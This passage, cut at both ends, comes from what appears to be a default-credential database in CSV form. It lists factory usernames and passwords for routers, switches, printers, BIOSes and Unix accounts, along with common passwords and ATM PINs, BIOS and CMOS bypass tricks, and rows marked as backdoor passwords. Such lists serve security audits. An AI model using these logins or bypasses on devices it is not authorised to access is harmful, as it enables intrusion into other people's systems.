cardholders,\ntop20mostusedatmpins,#20,,ATM,,1010,,Used by 0.29 percent of all cardholders,\ntop26mostusedpasswords,# 2,,,,123456,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,# 3,,,,12345678,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,# 4,,,,qwerty,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,# 5,,,,abc123,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,# 6,,,,monkey,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,# 7,,,,1234567,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,# 8,,,,letmein,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,# 9,,,,trustno1,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#10,,,,dragon,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#11,,,,baseball,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#12,,,,111111,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#13,,,,iloveyou,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#14,,,,master,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#15,,,,sunshine,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#16,,,,ashley,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#17,,,,bailey,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#18,,,,passw0rd,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#19,,,,shadow,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#20,,,,123123,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#21,,,,654321,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#22,,,,superman,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#23,,,,qazwsx,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#24,,,,michael,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#25,,,,football,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntop26mostusedpasswords,#26,,,,sesame,,No it's not \"love\" \"sex\" \"secret\" or \"god\".,\ntoplayer,AppSwitch 2500,,,siteadmin,toplayer,,Any,\ntoplayer,AppSwitch,,,siteadmin,toplayer,,,\ntopsec,firewall,,Multi,superman,talent,Admin,,\ntoshiba 8000,Laptop,,,,,,,\ntoshiba 8000,Laptop,,Admin,,,,,\ntoshiba,Most laptops,,console,,,,,\ntoshiba,Most laptops,,console,,,CMOS,Hold left shift key during boot to bypass CMOS password,\ntoshiba,PC BIOS,,,,24Banc81,,,\ntoshiba,PC BIOS,,,,toshy99,,,\ntoshiba,PC BIOS,,Admin,,24Banc81,,,\ntoshiba,PC BIOS,,Admin,,Toshiba,,,\ntoshiba,PC BIOS,,Admin,,toshy99,,,\ntoshiba,PC BIOS,,Console,,24Banc81,Admin,,\ntoshiba,PC BIOS,,Console,,Toshiba,Admin,,\ntoshiba,PC BIOS,,Console,,toshy99,Admin,,\ntoshiba,PC BIOS,notebooks,Floppy Drive,,4B 45 59 00 00,Admin,If the first 5 bytes of sector 1 of a floppy in drive A are 4B 45 59 00 00 then you can bypass the password by hitting enter when prompted for it (yes this is really bad).,\ntoshiba,PC BIOS,notebooks,Floppy Drive,,4B 45 59 00 00,Admin,If the first 5 bytes of sector 1 of a floppy in drive A are 4B 45 59 00 00 then you can bypass the password by hitting enter when prompted for it (yes,\ntoshiba,TR-650,,,admin,tr650,,V2.01.00,\ntoshiba,Toshiba 8000 Laptop,,Multi,,,Admin,,\ntoshiba,e-Studio,,,admin,123456,,,\ntoshiba,eStudio,All versions,http://,admin,123456,admin,,\ntotolink,Soho Routers,,,onlime_r,12345,,,\ntotolink,Soho Routers,,,root,12345,,,\ntp link,Tp link,,,admin,admin,,,\ntplink,,TD-W8951ND,http://192.168.1.1/,admin,admin,admin,,\ntplink,TD-8610,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8610B,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8616,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8616B,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8810,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8811,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8816,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8816B,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8817,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8817B,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8840,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8840B,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8840T,,http://192.168.1.1,admin,admin,,,\ntplink,TD-8840TB,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8101G,v1,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8101G,v3,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8151N,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8901G,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8901G,1G,http://192.168.1.1,,,admin,behsa,\ntplink,TD-W8901G,v6,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8901GB,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8920,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8920G,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8950ND,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8951ND IGD,TD-W8951ND,,admin,2011,,,\ntplink,TD-W8951ND,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8951ND,5.1,192.168.1.1,,,,,\ntplink,TD-W8951ND,5.1,192.168.1.1,maxcom,1234,http,A lot of this routers with this pass in Mexico city,\ntplink,TD-W8951ND,5.1,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8960N,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8960NB,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8961NB,,http://192.168.1.1,admin,admin,,,\ntplink,TD-W8961ND,,http://192.168.1.1,admin,admin,,,\ntplink,TD-WDR4300,,http://192.168.0.1,admin,admin,,,\ntplink,TD-WR541G,,http://192.168.1.1,admin,admin,,,\ntplink,TD-WR642G,,,admin,admin,,,\ntplink,TL-MR3220,,http://192.168.1.1,admin,admin,,,\ntplink,TL-MR3420,,http://192.168.1.1,admin,admin,,,\ntplink,TL-SG5426,,,(),super,Enable privileged exec level from normal exec level,,\ntplink,TL-SG5426,,console or http://192.168.1.1,admin,admin,admin,,\ntplink,TL-SG5426,,console or http://192.168.1.1,guest,guest,user,,\ntplink,TL-WA500G,,http://192.168.1.254,admin,admin,,,\ntplink,TL-WA501G,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WA5110G,,http://192.168.1.254,admin,admin,,,\ntplink,TL-WA5210G,,http://192.168.1.254,admin,admin,,,\ntplink,TL-WA541G,v2,http://192.168.1.1,admin,admin,,,\ntplink,TL-WA541G,v7,http://192.168.1.1,admin,admin,,,\ntplink,TL-WA542G,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WA543G,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WA601G,,http://192.168.1.254,admin,admin,,,\ntplink,TL-WA701ND,,http://192.168.1.254,admin,admin,,,\ntplink,TL-WA730RE,,http://192.168.1.254,admin,admin,,,\ntplink,TL-WA801ND,,http://192.168.1.254,admin,admin,,,\ntplink,TL-WA901ND,V2,http://192.168.1.254,admin,admin,,,\ntplink,TL-WR1043N,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR1043ND,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR2543ND,,http://tplinklogin.net,admin,admin,,,\ntplink,TL-WR340G,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR340GD,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR740N,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR740N,,http://tplinklogin.net,admin,admin,,,\ntplink,TL-WR741ND,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR743ND,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR841N,7.2,192.168.0.1,admin,admin,default,,\ntplink,TL-WR841N,V1,http://192.168.1.1,admin,admin,,also try http://192.168.1.1,\ntplink,TL-WR841N,V7,http://192.168.0.1,admin,admin,,,\ntplink,TL-WR841ND,V1,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR841ND,V7,http://192.168.0.1,admin,admin,,also try http://192.168.1.1,\ntplink,TL-WR940N,,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR941N,all versions,http://192.168.1.1,admin,admin,,,\ntplink,TL-WR941ND,all versions,http://192.168.1.1,admin,admin,,,\ntrend micro,InterScan VirusWall,,,admin,admin,,,\ntrend micro,Trend Micro,,,admin,admin,,,\ntrend micro,Viruswall,,Admin,admin,admin,,,\ntrend micro,Viruswall,,all versions,admin,admin,,,\ntrendmicro,,7.3,,admin,admin,,,\ntrendmicro,ISVW (VirusWall),,,admin,admin,,any,\ntrendmicro,Viruswall,all versions,HTTP on port 1812,admin,admin,Admin,,\ntrendnet,DI-524,802.11g/2.46hz,192.168.1.1,,,admin,,\ntrendnet,TDM-C500,101,ADSL,,,DEFAULT,,\ntrendnet,TEG-240WS,,http://192.168.0.1,,admin,Admin,,\ntrendnet,TEW 432 BRP,,HTTP://192.168.1.1,admin,admin,root,nothing,\ntrendnet,TEW 432BRP,all versions,http://192.168.1.1/,,,Admin,,\ntrendnet,TEW-231brp,,http://192.168.1.1,default,,Admin,,\ntrendnet,TEW-411BRP,,198.162.1.1,,admin,Admin access,,\ntrendnet,TEW-432BRB,432BRB,http://192.168.10.1,yarali,konya1,konya1,,\ntrendnet,TEW-432BRB,432BRB,http://192.168.10.1,yarali,konya1,konya1,konya,\ntrendnet,TEW-432BRP,,HTTP://192.168.1.1,admin,admin,root,nothing,\ntrendnet,TEW-432BRP,,http://192.168.0.1,,,,,\ntrendnet,TEW-432BRP,,http://192.168.10.1,admin,admin,,,\ntrendnet,TEW-432BRP,3.10b10,192.168.10.1,admin,admin,admin,,\ntrendnet,TEW-432BRP,TEW-432BRP,,hiua,xurxure,blank,,\ntrendnet,TEW-450APB,,,admin,admin,,,\ntrendnet,TEW-450APB,C1.0R,http://192.168.10.100,admin,admin,Admin user,This is from the manual - the trendnet website advertises the default as 192.168.1.1 which doesn't work.,\ntrendnet,TEW-452BRP,,http://192.168.1.1,admin,admin,,,\ntrendnet,TEW-510APB,,http://192.168.1.250,,admin,,,\ntrendnet,TEW-511BRP,,http://192.168.1.1,,admin,,,\ntrendnet,TEW-631BRP,,http://192.168.1.1,admin,admin,,,\ntrendnet,TEW-639GR,,192.168.10.1,admin,payago,,,\ntrendnet,TEW-652BRP h/w:v3.2r,3.00b13,http:192.168.10.1,admin,admin,admin,,\ntrendnet,TEW-652BRP,2.00b34,,,,S/N: C210226503821,H/W:V2.2R,\ntrendnet,TEW-652BRP,H/W:V1.OR,HTTP://192.168.10.1,ADMIN,ADMIN,ADMIN,,\ntrendnet,TEW-652BRP,H/W:V1.OR,HTTP://192.168.10.1,AMIN,ADMIN,ADMIN,,\ntrendnet,TEW-671BR,,http://192.168.10.1,admin,admin,Admin,,\ntrendnet,TK1601R,,,,0,,,\ntrendnet,TK1601R,,,,00000000,,,\ntrendnet,TK1602R,,,,0,,,\ntrendnet,TK1602R,,,,00000000,,,\ntrendnet,TK801R,,,,0,,,\ntrendnet,TK801R,,,,00000000,,,\ntrendnet,TK802R,,,,0,,,\ntrendnet,TK802R,,,,00000000,,,\ntrendnet,TPL110AP,,http://10.0.0.3,admin,admin,,,\ntrendnet,TRENDNET TEW411BRP,,198.162.1.1,,admin,Admin access,,\ntrendnet,TW100-BRF114,,http://192.168.0.1,,,,,\ntrendnet,TW100-BRV204,,,,,,,\ntrendnet,TW100-BRV304,,,,,,,\ntrendnet,TW100-S4W1CA,,http://192.168.0.1,admini,admini,admin,,\ntrendnet,TW100-S4W1CA,,http://192.168.1.1,,,,,\ntrendnet,tew-432brp,windows7,http://192.168.10,1,,admin,,\ntrendnet,tw100-s4w1ca,,http://192.168.0.1,admini,admini,admin,nnu stiu parola si numele vechi de la trendnet,\ntresystechnology,CLIP,,,,neutronbass,,Note that the docs strongly urge the installing tech to change this pass immediately.,\ntrintech,eAcquirer App/Data Servers,,,t3admin,Trintech,,,\ntrintech,eAcquirer,,,t3admin,Trintech,,,\ntriumphadler,CD1435 / DC 2435,,http://,Admin,Admin,admin,,\ntriumphadler,DC 2116,,,admin,0,,,\ntriumphadler,DC2116,1,http://,admin,0,admin,,\ntriumphadler,DC2116,1.0,http://,admin,0000,admin,,\ntroy,ExtendNet 100zx,,Multi,admin,extendnet,Admin,dizphunKt,\ntsunami,Tsunami-45,,,managers,managers,,,\ntsunami,Tsunami-45,1,Multi,managers,managers,,,\ntsunami,Tsunami-45,1.0,Multi,managers,managers,,,\ntvt system,Expresse G5 DS1 Module,,,,enter,,,\ntvt system,Expresse G5 DS1 Module,,Admin,,enter,,,\ntvt system,Expresse G5,,,craft,,,,\ntvt system,Expresse G5,,Admin,craft,,,,\ntvtsystem,Expresse G5 DS1 Module,,Multi,,enter,Admin,,\ntvtsystem,Expresse G5,,Multi,craft,,Admin,,\ntype3,Typo3,3.6,,admin,password,Admin,,\ntypo3,TYPO3,,3.6,admin,password,,,\nubiquitinetworks,Bullet 2,,192.168.1.20,ubnt,ubnt,Admin,,\nubiquitinetworks,Bullet M2HP,,192.168.1.20,ubnt,ubnt,Admin,,\nubiquitinetworks,NS2,,192.168.1.20,ubnt,ubnt,Admin,,\nubiquitinetworks,PS2,,192.168.1.20,ubnt,ubnt,Admin,,\nubiquitinetworks,all models,,,ubnt,ubnt,Admin,,\nunex,NexIP Routers,,,,password,,,\nunex,NexIP Routers,,HTTP,,password,Admin,,\nuniden,UIP1868P,,http://192.168.15.1,admin,UnidEn79!,Configuration,password is case sensitive,\nuniden,UIP1869V,,http://192.168.15.1,admin,admin,,,\nuniden,UIP300,,HTTP,user,123456,,,\nuniden,WNR2004,,http://192.168.1.1,UNIDEN,,,,\nunidesk,Management Appliance (MA),,,Administrator,Unidesk1,,,\nunify,OpenStage SIP Webinterface,,,,123456,,,\nunisys,ClearPath MCP,,Multi,ADMINISTRATOR,ADMINISTRATOR,Admin,,\nunisys,ClearPath MCP,,Multi,HTTP,HTTP,Web Server Administration,,\nunisys,ClearPath MCP,,Multi,NAU,NAU,Privileged,Network Administration Utility,\nunitedtechnologiescorporation,Interlogix truVision IP Camera,,,admin,1234,,,\nunix,Generic,,,adm,,,,\nunix,Generic,,,adm,adm,,,\nunix,Generic,,,admin,admin,,,\nunix,Generic,,,administrator,,,,\nunix,Generic,,,administrator,administrator,,,\nunix,Generic,,,anon,anon,,,\nunix,Generic,,,bbs,,,,\nunix,Generic,,,bbs,bbs,,,\nunix,Generic,,,bin,sys,,,\nunix,Generic,,,checkfs,checkfs,,,\nunix,Generic,,,checkfsys,checkfsys,,,\nunix,Generic,,,checksys,checksys,,,\nunix,Generic,,,daemon,daemon,,,\nunix,Generic,,,demo,,,,\nunix,Generic,,,demo,demo,,,\nunix,Generic,,,demos,,,,\nunix,Generic,,,demos,demos,,,\nunix,Generic,,,dni,,,,\nunix,Generic,,,fal,,,,\nunix,Generic,,,fal,fal,,,\nunix,Generic,,,fax,fax,,,\nunix,Generic,,,ftp,,,,\nunix,Generic,,,ftp,ftp,,,\nunix,Generic,,,games,games,,,\nunix,Generic,,,gopher,gopher,,,\nunix,Generic,,,gropher,,,,\nunix,Generic,,,guest,,,,\nunix,Generic,,,guest,guestgue,,,\nunix,Generic,,,halt,,,,\nunix,Generic,,,halt,halt,,,\nunix,Generic,,,informix,informix,,,\nunix,Generic,,,install,install,,,\nunix,Generic,,,lp,,,,\nunix,Generic,,,lp,lp,,,\nunix,Generic,,,lpadm,lpadm,,,\nunix,Generic,,,lpadmin,lpadmin,,,\nunix,Generic,,,lynx,,,,\nunix,Generic,,,mail,,,,\nunix,Generic,,,mail,mail,,,\nunix,Generic,,,man,man,,,\nunix,Generic,,,me,,,,\nunix,Generic,,,mountfs,mountfs,,,\nunix,Generic,,,mountfsys,mountfsys,,,\nunix,Generic,,,mountsys,mountsys,,,\nunix,Generic,,,news,news,,,\nunix,Generic,,,nobody,,,,\nunix,Generic,,,nobody,nobody,,,\nunix,Generic,,,nuucp,,,,\nunix,Generic,,,operator,,,,\nunix,Generic,,,operator,operator,,,\nunix,Generic,,,oracle,,,,\nunix,Generic,,,postmaster,postmast,,,\nunix,Generic,,,powerdown,powerdown,,,\nunix,Generic,,,rje,rje,,,\nunix,Generic,,,root,root,,,\nunix,Generic,,,setup,setup,,,\nunix,Generic,,,shutdown,,,,\nunix,Generic,,,shutdown,shutdown,,,\nunix,Generic,,,sync,,,,\nunix,Generic,,,sync,sync,,,\nunix,Generic,,,sys,sys,,,\nunix,Generic,,,sys,system,,,\nunix,Generic,,,sysadm,admin,,,\nunix,Generic,,,sysadm,sysadm,,,\nunix,Generic,,,sysadmin,sysadmin,,,\nunix,Generic,,,sysbin,sysbin,,,\nunix,Generic,,,system_admin,,,,\nunix,Generic,,,system_admin,system_admin,,,\nunix,Generic,,,trouble,trouble,,,\nunix,Generic,,,umountfs,umountfs,,,\nunix,Generic,,,umountfsys,umountfsys,,,\nunix,Generic,,,umountsys,umountsys,,,\nunix,Generic,,,unix,unix,,,\nunix,Generic,,,user,user,,,\nunix,Generic,,,uucp,uucp,,,\nunix,Generic,,,uucpadm,uucpadm,,,\nunix,Generic,,,web,,,,\nunix,Generic,,,web,web,,,\nunix,Generic,,,webmaster,,,,\nunix,Generic,,,www,,,,\nunix,Generic,,Admin,adm,,,,\nunix,Generic,,Admin,adm,adm,,,\nunix,Generic,,Admin,bin,sys,,,\nunix,Generic,,Admin,install,install,,,\nunix,Generic,,Admin,mountfs,mountfs,,,\nunix,Generic,,Admin,mountfsys,mountfsys,,,\nunix,Generic,,Admin,mountsys,mountsys,,,\nunix,Generic,,Admin,root,,,,\nunix,Generic,,Admin,root,hp,,,\nunix,Generic,,Admin,root,root,,,\nunix,Generic,,Admin,setup,setup,,,\nunix,Generic,,Admin,sys,bin,,,\nunix,Generic,,Admin,sys,sys,,,\nunix,Generic,,Admin,sys,system,,,\nunix,Generic,,Admin,sysadm,admin,,,\nunix,Generic,,Admin,sysadm,sysadm,,,\nunix,Generic,,Admin,sysadmin,sysadmin,,,\nunix,Generic,,Admin,sysbin,sysbin,,,\nunix,Generic,,Admin,system_admin,,,,\nunix,Generic,,Admin,system_admin,system_admin,,,\nunix,Generic,,HP-UX,root,hp,,,\nunix,Generic,,Multi,adm,,Admin,,\nunix,Generic,,Multi,adm,adm,Admin,,\nunix,Generic,,Multi,admin,admin,User,,\nunix,Generic,,Multi,administrator,,User,,\nunix,Generic,,Multi,administrator,administrator,User,,\nunix,Generic,,Multi,anon,anon,User,,\nunix,Generic,,Multi,bbs,,User,,\nunix,Generic,,Multi,bbs,bbs,User,,\nunix,Generic,,Multi,bin,sys,Admin,,\nunix,Generic,,Multi,checkfs,checkfs,User,,\nunix,Generic,,Multi,checkfsys,checkfsys,User,,\nunix,Generic,,Multi,checksys,checksys,User,,\nunix,Generic,,Multi,daemon,,User,,\nunix,Generic,,Multi,daemon,daemon,User,,\nunix,Generic,,Multi,demo,,User,,\nunix,Generic,,Multi,demo,demo,User,,\nunix,Generic,,Multi,demos,,User,,\nunix,Generic,,Multi,demos,demos,User,,\nunix,Generic,,Multi,dni,,User,,\nunix,Generic,,Multi,dni,dni,User,,\nunix,Generic,,Multi,fal,,User,,\nunix,Generic,,Multi,fal,fal,User,,\nunix,Generic,,Multi,fax,,User,,\nunix,Generic,,Multi,fax,fax,User,,\nunix,Generic,,Multi,ftp,,User,,\nunix,Generic,,Multi,ftp,ftp,User,,\nunix,Generic,,Multi,games,,User,,\nunix,Generic,,Multi,games,games,User,,\nunix,Generic,,Multi,gopher,gopher,User,,\nunix,Generic,,Multi,gropher,,User,,\nunix,Generic,,Multi,guest,,User,,\nunix,Generic,,Multi,guest,guest,User,,\nunix,Generic,,Multi,guest,guestgue,User,,\nunix,Generic,,Multi,halt,,User,,\nunix,Generic,,Multi,halt,halt,User,,\nunix,Generic,,Multi,informix,informix,User,,\nunix,Generic,,Multi,install,install,Admin,,\nunix,Generic,,Multi,lp,,User,,\nunix,Generic,,Multi,lp,bin,User,,\nunix,Generic,,Multi,lp,lineprin,User,,\nunix,Generic,,Multi,lp,lp,User,,\nunix,Generic,,Multi,lpadm,lpadm,User,,\nunix,Generic,,Multi,lpadmin,lpadmin,User,,\nunix,Generic,,Multi,lynx,,User,,\nunix,Generic,,Multi,lynx,lynx,User,,\nunix,Generic,,Multi,mail,,User,,\nunix,Generic,,Multi,mail,mail,User,,\nunix,Generic,,Multi,man,,User,,\nunix,Generic,,Multi,man,man,User,,\nunix,Generic,,Multi,me,,User,,\nunix,Generic,,Multi,me,me,User,,\nunix,Generic,,Multi,mountfs,mountfs,Admin,,\nunix,Generic,,Multi,mountfsys,mountfsys,Admin,,\nunix,Generic,,Multi,mountsys,mountsys,Admin,,\nunix,Generic,,Multi,news,,User,,\nunix,Generic,,Multi,news,news,User,,\nunix,Generic,,Multi,nobody,,User,,\nunix,Generic,,Multi,nobody,nobody,User,,\nunix,Generic,,Multi,nuucp,,User,,\nunix,Generic,,Multi,operator,,User,,\nunix,Generic,,Multi,operator,operator,User,,\nunix,Generic,,Multi,oracle,,User,,\nunix,Generic,,Multi,postmaster,,User,,\nunix,Generic,,Multi,postmaster,postmast,User,,\nunix,Generic,,Multi,powerdown,powerdown,User,,\nunix,Generic,,Multi,root,,Admin,,\nunix,Generic,,Multi,root,root,Admin,,\nunix,Generic,,Multi,setup,setup,Admin,,\nunix,Generic,,Multi,shutdown,,User,,\nunix,Generic,,Multi,shutdown,shutdown,User,,\nunix,Generic,,Multi,sync,,User,,\nunix,Generic,,Multi,sync,sync,User,,\nunix,Generic,,Multi,sys,bin,Admin,,\nunix,Generic,,Multi,sys,sys,Admin,,\nunix,Generic,,Multi,sys,system,Admin,,\nunix,Generic,,Multi,sysadm,admin,Admin,,\nunix,Generic,,Multi,sysadm,sysadm,Admin,,\nunix,Generic,,Multi,sysadmin,sysadmin,Admin,,\nunix,Generic,,Multi,sysbin,sysbin,Admin,,\nunix,Generic,,Multi,system_admin,,Admin,,\nunix,Generic,,Multi,system_admin,system_admin,Admin,,\nunix,Generic,,Multi,trouble,trouble,User,,\nunix,Generic,,Multi,umountfs,umountfs,User,,\nunix,Generic,,Multi,umountfsys,umountfsys,User,,\nunix,Generic,,Multi,umountsys,umountsys,User,,\nunix,Generic,,Multi,unix,unix,User,,\nunix,Generic,,Multi,user,user,User,,\nunix,Generic,,Multi,uucp,uucp,User,,\nunix,Generic,,Multi,uucpadm,uucpadm,User,,\nunix,Generic,,Multi,web,,User,,\nunix,Generic,,Multi,web,web,User,,\nunix,Generic,,Multi,webmaster,,User,,\nunix,Generic,,Multi,webmaster,webmaster,User,,\nunix,Generic,,Multi,www,,User,,\nunix,Generic,,Multi,www,www,User,,\nunix,Generic,,User,admin,admin,,,\nunix,Generic,,User,administrator,,,,\nunix,Generic,,User,administrator,administrator,,,\nunix,Generic,,User,anon,anon,,,\nunix,Generic,,User,bbs,,,,\nunix,Generic,,User,bbs,bbs,,,\nunix,Generic,,User,checkfs,checkfs,,,\nunix,Generic,,User,checkfsys,checkfsys,,,\nunix,Generic,,User,checksys,checksys,,,\nunix,Generic,,User,daemon,,,,\nunix,Generic,,User,daemon,daemon,,,\nunix,Generic,,User,demo,,,,\nunix,Generic,,User,demo,demo,,,\nunix,Generic,,User,demos,,,,\nunix,Generic,,User,demos,demos,,,\nunix,Generic,,User,dni,,,,\nunix,Generic,,User,dni,dni,,,\nunix,Generic,,User,fal,,,,\nunix,Generic,,User,fal,fal,,,\nunix,Generic,,User,fax,,,,\nunix,Generic,,User,fax,fax,,,\nunix,Generic,,User,ftp,,,,\nunix,Generic,,User,ftp,ftp,,,\nunix,Generic,,User,games,,,,\nunix,Generic,,User,games,games,,,\nunix,Generic,,User,gopher,gopher,,,\nunix,Generic,,User,gropher,,,,\nunix,Generic,,User,guest,,,,\nunix,Generic,,User,guest,guest,,,\nunix,Generic,,User,guest,guestgue,,,\nunix,Generic,,User,halt,,,,\nunix,Generic,,User,halt,halt,,,\nunix,Generic,,User,informix,informix,,,\nunix,Generic,,User,lp,,,,\nunix,Generic,,User,lp,bin,,,\nunix,Generic,,User,lp,lineprin,,,\nunix,Generic,,User,lp,lp,,,\nunix,Generic,,User,lpadm,lpadm,,,\nunix,Generic,,User,lpadmin,lpadmin,,,\nunix,Generic,,User,lynx,,,,\nunix,Generic,,User,lynx,lynx,,,\nunix,Generic,,User,mail,,,,\nunix,Generic,,User,mail,mail,,,\nunix,Generic,,User,man,,,,\nunix,Generic,,User,man,man,,,\nunix,Generic,,User,me,,,,\nunix,Generic,,User,me,me,,,\nunix,Generic,,User,news,,,,\nunix,Generic,,User,news,news,,,\nunix,Generic,,User,nobody,,,,\nunix,Generic,,User,nobody,nobody,,,\nunix,Generic,,User,nuucp,,,,\nunix,Generic,,User,operator,,,,\nunix,Generic,,User,operator,operator,,,\nunix,Generic,,User,oracle,,,,\nunix,Generic,,User,postmaster,,,,\nunix,Generic,,User,postmaster,postmast,,,\nunix,Generic,,User,powerdown,powerdown,,,\nunix,Generic,,User,rje,rje,,,\nunix,Generic,,User,shu|own,,,,\nunix,Generic,,User,shu|own,shu|own,,,\nunix,Generic,,User,sync,,,,\nunix,Generic,,User,sync,sync,,,\nunix,Generic,,User,trouble,trouble,,,\nunix,Generic,,User,umountfs,umountfs,,,\nunix,Generic,,User,umountfsys,umountfsys,,,\nunix,Generic,,User,umountsys,umountsys,,,\nunix,Generic,,User,unix,unix,,,\nunix,Generic,,User,user,user,,,\nunix,Generic,,User,uucp,uucp,,,\nunix,Generic,,User,uucpadm,uucpadm,,,\nunix,Generic,,User,web,,,,\nunix,Generic,,User,web,web,,,\nunix,Generic,,User,webmaster,,,,\nunix,Generic,,User,webmaster,webmaster,,,\nunix,Generic,,User,www,,,,\nunix,Generic,,User,www,www,,,\nunix,Generic,HP-UX,Multi,root,hp,Admin,,\nunix,Generic,early versions,console or telnet,root,gnomes,Admin,early backdoor password that likely is no longer in use anywhere except by nostalgic old-school admins running much newer systems,\nunix,UNIX,,,setup,,,,\nunix,Unix,,,service,smile,,,\nunknown,POCSAG Radio Paging,,2.05,,password,,,\nunknown,System 88,,,operator,operator,,,\nunknown,System 88,,,overseer,overseer,,,\nunknown,System 88,,,test,test,,,\nus robotics,USR8000,,1.23 / 1.25,root,admin,,,\nus robotics,USR8000,,Admin,root,admin,,,\nus robotics,USR8550,,3.0.5,Any,12345,,,\nusrobotics,805451,805451,,usr54321,usr54321,full,access,\nusrobotics,ADSL Ethernet Modem,,HTTP,,12345,Admin,,\nusrobotics,SureConnect 9003 ADSL Ethernet/USB Router,,Multi,root,12345,Admin,,\nusrobotics,SureConnect 9105 ADSL 4-Port Router,,HTTP,admin,admin,Admin,,\nusrobotics,SureConnect ADSL ,SureConnect ADSL ,Telnet,support,support,User,works after 3rd login trial,\nusrobotics,TOTALswitch,,,,amber,,,\nusrobotics,TOTALswitch,,,,amber,,Any,\nusrobotics,USR5450,,,admin,,Admin,,\nusrobotics,USR8000,1.23 / 1.25,Multi,root,admin,Admin,DSL-Router. Web-Login always uses user root,\nusrobotics,USR8054 Router,,,admin,,,,\nusrobotics,USR8550,,Any,Any,12345,,,\nusrobotics,USR8550,3.0.5,Multi,Any,12345,Any,Best Modem,\nusrobotics,Wireless ADSL Router,,,admin,admin,,,\nusrobotics,adsl gateway wireless router,,wireless router,support,support,super user access,I find it on a manual,\nut,Lexar PBX Switch,,,lexar,,,,\nutlexar,Telephone Switches,,,DESIGNED_BY_IC_KF,,Backdoor,,\nutlexar,Telephone Switches,,,lexar,,maintenance default,,\nutstar,UT300R,,Multi,admin,utstar,root,,\nutstar,UT300R,,root,admin,utstar,,,\nutstarcom,B-NAS B-RAS,,1000,dbase,dbase,,,\nutstarcom,B-NAS B-RAS,,1000,field,field,,,\nutstarcom,B-NAS B-RAS,,1000,guru,*3noguru,,,\nutstarcom,B-NAS B-RAS,,1000,snmp,snmp,,,\nutstarcom,B-NAS,B-RAS,1000,,dbase,dbase,,\nutstarcom,B-NAS,B-RAS,1000,,field,field,,\nutstarcom,B-NAS,B-RAS,1000,,guru,*3noguru,,\nutstarcom,B-NAS,B-RAS,1000,,snmp,snmp,,\nvasco,VACMAN Middleware,2.x,Multi,admin,,Admin,strong authentication server,\nvbricksystems,Multiple,,,admin,admin,,,\nveenman,Linium C353,all versions,console and IP,,12345678,admin,,\nvendor,Product,Revision,Protocol,User,Password,Access,Notes,\nvendor,system,,verified,password,level,,,\nvendor,system,,version,login,password,,,\nveramark,eCAS,,Administrative,admin,password,,,\nverifone,Verifone Junior,,,,166816,,,\nverifone,Verifone Junior,,2.05,,166816,,,\nverifone,Verifone Junior,2.05,,,166816,,,\nverilink,NE6100-4 NetEngine,IAD 